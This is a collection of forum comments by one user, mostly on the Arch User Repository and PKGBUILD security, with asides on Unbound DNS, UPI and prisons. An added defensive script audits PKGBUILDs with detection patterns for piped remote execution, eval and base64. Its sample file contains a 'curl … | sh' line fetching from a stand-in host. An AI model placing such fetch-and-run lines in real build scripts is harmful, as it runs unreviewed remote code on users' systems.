
Comment Re:Arch will be fine (Score 2) 50

The 'pain' here is that Arch wanted to provide a way for users to manage 'ad hoc' packages within the pacman system and make them available to other users if necessary. For reference I can find examples of only 4 other Linux distros that support an equivalent:

  • Gentoo GURU (Gentoo User Repository), an official user-contributed overlay. Also the broader ebuild overlay ecosystem.
  • NixOS NUR (Nix User Repository), explicitly modeled on the AUR.
  • Slackware SlackBuilds.org, community build scripts (though run independently, not by Slackware officially).
  • CRUX its user-maintained ports collections.

As GP says Arch may need a rethink of how AUR is accessed and used, but I think it's idiotic to paint Arch as a whole in a negative light for a niche user contribution add-on that is totally separate to their official package line.

Comment Re:This is validating my decision to stay on Debia (Score 1) 50

What we don't trust are user repositories, where anons like you and me can publish a binary.

Great point supporting the wrong argument. AUR does NOT host binaries - there is NO WAY for anon to make a binary available directly to Arch users. Let's all get this clear.

What is the AUR?

The AUR (Arch User Repository) is a community-driven repository of build scripts called PKGBUILDs. It doesn't host packages themselves — it hosts recipes that tell your system how to fetch sources and compile/package software locally.

What it hosts: PKGBUILDs for software not in the official repos — proprietary apps (Spotify, Chrome), bleeding-edge or -git versions, niche tools, and packages awaiting promotion to official repos. The scripts are user-submitted and unvetted, so you should read a PKGBUILD before building.

What's a PKGBUILD?

Typical basic example:

# Maintainer: Your Name <you@example.com>
pkgname=hello
pkgver=2.12.1
pkgrel=1
pkgdesc="GNU Hello, a program that prints a friendly greeting"
arch=('x86_64')
url="https://www.gnu.org/software/hello/"
license=('GPL-3.0-or-later')
depends=('glibc')
makedepends=('gcc')
source=("https://ftp.gnu.org/gnu/hello/hello-${pkgver}.tar.gz")
sha256sums=('SKIP') # replace with real checksum, or use updpkgsums

build() {
    cd "$srcdir/$pkgname-$pkgver"
    ./configure --prefix=/usr
    make
}

package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
}

The entire POINT of AUR is that anyone can add a script for something they find useful. It can then be voted on by members for consideration to move into an official repo. From the above it's pretty clear that the onus for security and reviewing code is ENTIRELY on the user, and it's almost impossible to imagine that a compromised build script would just pick up votes and make it to a repo.

So in summary AUR is exactly like your Gentoo compile scripts.
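
A static pre-build check for the kind of PKGBUILD review the comment above puts on the user, as an added example that is not part of the original comment and not an Arch or AUR tool. The function name `audit_pkgbuild`, the finding labels and the sample file are constructed for illustration.

```sh
#!/bin/sh
# Static pre-build review of a PKGBUILD. The file is only read with grep and
# never sourced, because sourcing a PKGBUILD executes the code inside it.
# audit_pkgbuild and the finding labels are hypothetical names for this example.
audit_pkgbuild() {
    f=$1
    # Print the label when any non-comment line matches the pattern.
    check() { if grep -Eq -e "$2" "$f"; then echo "$1"; fi; }
    # SKIP turns off integrity verification for that source entry.
    check checksum-skip   "^[^#]*['\"]SKIP['\"]"
    # Plaintext transports let the download be modified in transit.
    check insecure-source "^[^#]*(http|ftp|git)://"
    # A download piped into a shell runs code that is not in the PKGBUILD.
    check remote-exec     "^[^#]*(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)"
    # Decoding or eval'ing strings hides what the build really runs.
    check obfuscation     "^[^#]*(base64[[:space:]]+(-d|--decode)|[[:space:];]eval[[:space:]])"
    # An install= scriptlet is run by pacman as root; review that file too.
    check install-hook    "^[[:space:]]*install="
    return 0
}

# Constructed sample: the hello PKGBUILD above with four risky changes.
sample=$(mktemp)
cat > "$sample" <<'EOF'
pkgname=hello
pkgver=2.12.1
source=("http://mirror.example/hello-${pkgver}.tar.gz")
sha256sums=('SKIP')
install=hello.install
build() {
    cd "$srcdir/$pkgname-$pkgver"
    curl -s https://example.invalid/setup.sh | sh
    ./configure --prefix=/usr && make
}
EOF
audit_pkgbuild "$sample"
```

A clean result only means none of these patterns appeared; the build() and package() bodies still need to be read.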

Comment Re:PiHole (Score 5, Interesting) 160

Unbound: Unbound is a validating, recursive, caching DNS resolver. The main reason people run it is recursion: instead of forwarding your queries to an upstream like 1.1.1.1 or 8.8.8.8, Unbound walks the hierarchy itself — root servers, then TLD servers, then the authoritative server for the domain. The payoff is that no single third party ever sees your full query stream, and you're not trusting a public resolver's logging or filtering policies. It also does DNSSEC validation (cryptographically verifying answers weren't tampered with) and caches results locally for speed.

Comment Re:AUR (Score 2) 38

Come on, one of the big draws of Linux is how easy it is to install and update your software.

Yeah, and if you've ever used pacman that is 100% true. We aren't talking about pacman here.

"Oh we never said it wasn't going to fuck your system up with malware" deserves a Powny prize.

AUR is explicitly a repo for user contributions. There is no signing, vetting, or anything - anyone who can read already knows this. Again you seem to be mixing up official Arch packages from official repos via pacman, versus building whatever shit I throw together in AUR with yay. Absolutely not the same thing.

Comment Re:Interesting (Score 3, Informative) 133

Yes functionally it is really good but, much like the Aadhaar biometric ID system, the direction of travel is that it becomes so ubiquitous you are more or less forced to use it.

In a country where you actually have things like rule of law, separation of powers, freedom of speech and assembly, this might be ok. But both Aadhaar and UPI are moving towards 'data maximization' and user profiling at govt/state level, with your spending and service utilization data being shared with an opaque group of favored providers.

Comment Re:"only 334" (Score 2) 3

the compromise did not affect vault or customer data

from the article - "This targeting is unusually specific. In addition to standard developer secrets such as .npmrc and .git-credentials, the malware also hunts for AI tool configuration and MCP-related files, suggesting deliberate interest in environments where coding assistants or local automation tools may expose API keys or workflow secrets."

Comment Re:You're completely missing my point (Score 1) 50

Definitely - a lot of people doing 'bad' things are broken in some way, had difficult/abusive childhoods etc etc. Not minimizing that at all, and it's something we have to work on as a society.

But what we're each saying isn't mutually exclusive - a person's background is obviously relevant to why they ended up in court. But the point is - they still did something horrible. I saw on multiple occasions, people not going to jail for awful crimes because their lawyer told Court what a difficult upbringing they had - and then that person going on to do something horrible to vulnerable people. Actually meeting a few of those victims and talking about their confusion/amazement that the perp was allowed to come back and beat/rape them really changed my worldview on all this.

Comment Re:Nobody deserves to go to prison (Score 1) 50

I'm politically on the 'left' but I think you're dead wrong about this.

In a previous career I spent LOTS of time talking to criminals of all stripes, from shoplifters to serial killers. I went into that job thinking more or less the same as your above post; I came out of it many years later thinking the exact opposite. There's definitely inequality in terms of who gets sent to jail, but what I learned (n=1, this is just my opinion) is that we need prisons, and prisons don't have to be about education, reform, whatever - they can just be about punishment and that's fine.
